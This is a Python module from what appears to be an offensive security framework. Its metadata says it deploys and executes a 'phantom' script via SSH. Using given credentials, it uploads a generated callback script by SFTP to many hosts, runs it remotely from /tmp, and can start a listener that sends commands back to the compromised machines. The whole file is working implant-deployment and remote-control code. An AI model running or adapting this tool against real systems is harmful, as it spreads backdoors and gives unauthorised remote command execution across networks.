#!/usr/bin/env python
import os
import paramiko
import sys
import time

from core.backbone import rhosts_process
from core.multi_mod import launcher
from multiprocessing import Process

meta = {
        'author':'Benjamin Donnelly',
        'ported_by':'Benjamin Donnelly',
        'version':'0.1.0',
        "info":"""Deploys and executes a phantom script via ssh"""
}

variables = {"listen":["no","yes","Want to start listening?"],"commands":["","no","Commands to send to deploys"],"custom":["","no","Custom script to use, blank for default"],"lhost":["","yes","The host to call back to"],"lport":["1226","yes","The port to call back to"],"rhosts":["","yes","List of hosts to deploy to. ',' seperated.  Takes CIDR and Range with '-' between start and end ip."],"rport":["22","yes","Port to connect to"],"username":["","yes","Username to login with"],"password":["","yes","password to login with"],"ex_dir":["/tmp","yes","directory to execute from (think privileges)"]}




def build_script(lhost, lport, qu):
	l = launcher()
	l.launch("generate/phantom/basic",{"host":[lhost,"yes","The address to call back to"],"port":[lport,"yes","The port to call back to"],"output_file":["tmp/phantom.py","yes","File to output to"]}
,qu)
	return

def push_script(rhost, rport, username, password, ex_dir, script_loc, timedelay=5):
	time.sleep(timedelay)

	print "Attempting to upload script.."
	transport = paramiko.Transport((rhost, int(rport)))
	transport.connect(username = username, password = password)
	sftp = paramiko.SFTPClient.from_transport(transport)

	sftp.put(script_loc, ex_dir + "phantom.py")
	sftp.close()
	transport.close()
	print "Script uploaded!"
	return

def ex_script(rhost, rport, username, password, ex_dir, timedelay=10):
	time.sleep(timedelay)
	print "Attempting to execute script.."
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	ssh.connect(rhost, username=username, password=password)
	sin, sout, serr = ssh.exec_command("/bin/bash -c 'python " + ex_dir + "phantom.py | tee /tmp/tee.txt'")
	sin.channel.shutdown_write()
	print sout.readlines()
	return

class commands:

	def __init__(self):
		return

	@staticmethod
	def run(variables, pt):
		custom = variables['custom'][0]

		script_loc = ""

		commands = variables['commands'][0].decode("string_escape")

		listen = variables['listen'][0]
		lhost = variables['lhost'][0]
		lport = variables['lport'][0]
		rhosts = variables['rhosts'][0]
		rport = variables['rport'][0]
		username = variables['username'][0]
		password = variables['password'][0]
		ex_dir = variables['ex_dir'][0]
		if ex_dir[len(ex_dir)-1] != "/":
			ex_dir = ex_dir + "/"

		if len(custom) == 0:
			print "No custom script specified, building default.. "
			build_script(lhost, lport, qu)
			script_loc = "tmp/phantom.py"
		else:
			print "Custom specified"
			script_loc = custom
		
		for rhost in rhosts_process(rhosts):
			print "Attempting to push to: " + str(rhost)
			rhost = str(rhost)
			p = Process(target=push_script, args=(rhost, rport, username, password, ex_dir, script_loc,))
			p.daemon = True
			t = Process(target=ex_script, args=(rhost, rport, username, password, ex_dir,))
			t.daemon = True
			p.start()
			t.start()

		if listen == "yes":
			l = launcher()

			l.launch("local/listener/phantom/basic",{"host":[lhost,"no","Leave blank for default"], "port":[lport,"yes","port to listen on"],"commands":[commands,"no","command(s) to execute remotely; sperate by semi-colon."]}, qu)

			
		return ""	
